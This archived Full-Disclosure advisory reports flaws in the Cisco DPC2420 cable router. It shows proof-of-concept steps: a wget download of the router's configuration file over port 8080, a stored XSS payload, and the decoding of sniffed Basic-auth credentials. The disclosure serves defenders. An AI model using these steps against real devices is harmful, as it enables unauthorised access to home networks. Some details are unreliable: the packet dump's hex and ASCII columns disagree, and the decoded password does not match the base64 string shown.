lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 09 Dec 2012 20:25:43 -0300
From: "Facundo M. de la Cruz" <fmdlc@...e4life.com.ar>
To: full-disclosure@...ts.grok.org.uk
Subject: Cisco DPC2420 Multiples Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Hello to everyone,

I want to report the follow question with Cisco DPC2420 Cablemodem
router used by many ISP's around the world.

Bests.

- ---------------------------------------------------------------------

##
## ->  DPC2420 Multiple vulnerabilities
## ->  Facundo M. de la Cruz
## ->  fmdlc@...e4life.com.ar
##

[0x00]> Details

Vendor  : Cisco
Model   : DPC2420
type    : Cablemodem router.
Firmware: D2425-P10-13-v202r12811-110511as-TRO.bin
Software: D2425-P10-13-v202r12811-110511as-TRO
Website : http://www.cisco.com/web/consumer/support/modem_DPC2420.html

[0x01]> Configuration file disclosure

Some ISP's (like the Argentinean Telecentro) could make some changes in
the router configration via the TCP 8080 port.

If the remote config option is enabled and the port is not filter, an
attacker can download this file  calling the correct URL. For example:

$ wget http://foobar:8080/filename.gwc
- --2012-12-08 21:24:43--  http://foobar:8080/filename.gwc
Connecting to foobar:8080... connected.

HTTP request sent, awaiting response... 200 OK Length: unspecified
[application/octet-stream Content-transfer encoding: binary]

[  <=>                                                          ]
15,927      50.9K/s   in 0.3s
2012-12-08 21:24:43 (50.9 KB/s) - ?filename.gwc? saved [15927]

$ head -n 10 filename.gwc
CRCVALUE=4144540802;
#<<Begin of Configuration File>>
Version=1.1;
Created Date=2012/12/8;
Created Time=21:24:43;
Model Number=DPC2420;
Serial Number=234905123;
User Password=k3gUCBmdwbaviPW5GxMZ8vdgzHjvS3wKfdF2Lhbdwq+S6qn+1fvgs54YB
wl0jX2glgaQuXx27Eo3Fg3d5E1N7bk9yR7hDbzGS+y7XY4jJjY5yin5SkqAQp9GJl/sZO4s
4D7TJzy2od43flEwmdIPkyJC74eTOrZhb24ULJz3HV6ci5wn3gMPi0rTyk1c3pzHdiKWMMW
suMrYBi5sU9dqs1vhCfC/c2Is1xgU1Kq0Y1Wcn2LdmRFU6+7rjRuN6kjuAQZ3QcF/kiym3S
ewYRBbnRNKjMXCDw+M9y4V7Y8S4B63XuEwcq3OPUSLWKaA6yPDN5e5ZNxwJJuxl3irDXCd==;

[---OUTPUT OMITTED FOR SPACE REASONS---]

[0x02]> - Persistent XSS

With a valid user in the router web interface for managment and
configuration, a user could insert JavaScript code in this forms and
make a XSS, for example add a parental rule called:
"'/><script>alert(1</script>.

http://192.168.0.1/RgParentalBasic.asp

- -> Attachments: http://tty0.code4life.com.ar/CISCO-DPC2420-XSS.png

[0x03]> Authtype Basic

An attacker making an ARP poisoning attack could get the router loggin
credentials due the web interface authentication type is auth-basic.
Then the attacker could get the Base64 encoded password and convert it
to plain text easily.

20:58:47.879985 IP 172.16.1.242.34464 > 192.168.0.1.http: Flags [P.],
seq 0:372, ack 1, win 115

0x0000:  4500 01a8 fdf4 4000 4006 ccaf ac10 01f2  E.....@.@.......
0x0010:  c0a8 0001 86a0 0050 e4cf 13e5 76c7 819e  .......P....v...
0x0020:  8018 0073 03c2 0000 0101 080a 055f ee19  ...s........._..
0x0030:  0000 be7e 4745 5420 2f73 6967 6e61 6c2e  ...~GET./signal.
0x0040:  6173 7020 4854 5450 2f31 2e31 0d0a 486f  asp.HTTP/1.1..Ho
0x0050:  7374 3a20 3139 322e 3136 382e 302e 310d  st:.192.168.0.1.
0x0060:  0a55 7365 722d 4167 656e 743a 204d 6f7a  .User-Agent:.Moz
0x0070:  696c 6c61 2f35 2e30 2028 5831 313b 204c  illa/5.0.(X11;.L
0x0080:  696e 7578 2078 3836 5f36 343b 2072 763a  inux.x86_64;.rv:
0x0090:  3136 2e30 2920 4765 636b 6f2f 3230 3130  16.0).Gecko/2010
0x00a0:  3031 3031 2046 6972 6566 6f78 2f31 362e  0101.Firefox/16.
0x00b0:  300d 0a41 6363 6570 743a 2074 6578 742f  0..Accept:.text/
0x00c0:  6874 6d6c 2c61 7070 6c69 6361 7469 6f6e  html,application
0x00d0:  2f78 6874 6d6c 2b78 6d6c 2c61 7070 6c69  /xhtml+xml,appli
0x00e0:  6361 7469 6f6e 2f78 6d6c 3b71 3d30 2e39  cation/xml;q=0.9
0x00f0:  2c2a 2f2a 3b71 3d30 2e38 0d0a 4163 6365  ,*/*;q=0.8..Acce
0x0100:  7074 2d4c 616e 6775 6167 653a 2065 6e2d  pt-Language:.en-
0x0110:  5553 2c65 6e3b 713d 302e 350d 0a41 6363  US,en;q=0.5..Acc
0x0120:  6570 742d 456e 636f 6469 6e67 3a20 677a  ept-Encoding:.gz
0x0130:  6970 2c20 6465 666c 6174 650d 0a43 6f6e  ip,.deflate..Con
0x0140:  6e65 6374 696f 6e3a 206b 6565 702d 616c  nection:.keep-al
0x0150:  6976 650d 0a52 6566 6572 6572 3a20 6874  ive..Referer:.ht
0x0160:  7470 3a2f 2f31 3932 2e31 3638 2e30 2e31  tp://192.168.0.1
0x0170:  2f77 6562 7374 6172 2e68 746d 6c0d 0a41  /webstar.html..A
0x0180:  7574 686f 7269 7a61 7469 6f6e 3a20 4261  uthorization:.Ba
0x0190:  7369 6320 4f6b 4d30 626d fa38 3443 a9c0  sic.aWFtYXBhc3N3
0x01a0:  1b4e 1134 640a 054b                      ZAo==....

- From 0x0180 offset to the end of the packet payload an attacker could
get the password  encoded with Base64 and simply convert it to plain text:

$ echo aWFtYXBhc3N3ZAo== | base64 -d
iamapassword

- ---------------------------------------------------------------------
1355011796
- -- 
Facundo M. de la Cruz (tty0)
Unix Specialist
RHCE (Red Hat Certified Engineer)
http://www.codigounix.com.ar/

GPG fingerprint: DF2F 514A 5167 00F5 C753 BF3B D797 C8E1 5726 0789

"Programming today is a race between software engineers striving to
build bigger and better idiot-proof programs, and the Universe trying to
produce bigger and better idiots. So far, the Universe is winning." -
Rich Cook
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iQIcBAEBCgAGBQJQxR32AAoJENeXyOFXJgeJvgAQAIvmXCRCqcPTlcYqv4Pjw8Bu
NRaYmt2p9q8vGdDZohrgW6OBDooT9BsD945UTgdNBu0TQsIO1CQezuFfy2yVoQ2i
rB6ZvIVLuiEH/0sPnUP1GOHrfRZIJ86oBxuU31Z+oLJ7NspHK/tVN5x9VntG5kSw
8/RrP8uvrIKKnC5Ya1wfsKruv8eb85PP2ZA2AM6VMPCUStlOr55pXk8pP+ypuGNT
g4NuDc0Xn2EiKJS87DVr4P9m3Mm8Wv4axeJlzNvJS6l3l5qfEEplGJE3iFFoD/v1
Sl36UsQxtPw9RHpWC3mspyFHOjqxysST1ZxdDnKQVXPP0TVmcsWjzqA/1NVJ+JAa
6itnwLf6fkkMCD9EsJhGj/1CU/pigvtxnkdZK8lHsjYJdxAgWRpwaRPy+/PKUBnl
6osYiA3N/2nNhVqYwVw/JZN8vV0NokobWfCeQqCGQO8zXNx1CDjp+L2h4/rtyjqd
r3kJDg4x5GicJYfuIsEBtFyFAtU71KI3zcfjZvOq2d1SPbaXJilt6/XyN09eDqUB
SGVnzJTOHUZNn3SrDwcKgiNyh3Dtx0TDJM/Ee2JcvlO4nhyQy5yKUKkQjCWLlbfW
kEVjuufQY5uP+NUabrKMFWcFbwm8mdQjPK8vV7Ff0QBezuhsMHbk6hGUHwyR78Vb
Uc76o8c3d5uf5P2kqYQm
=NXdp
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists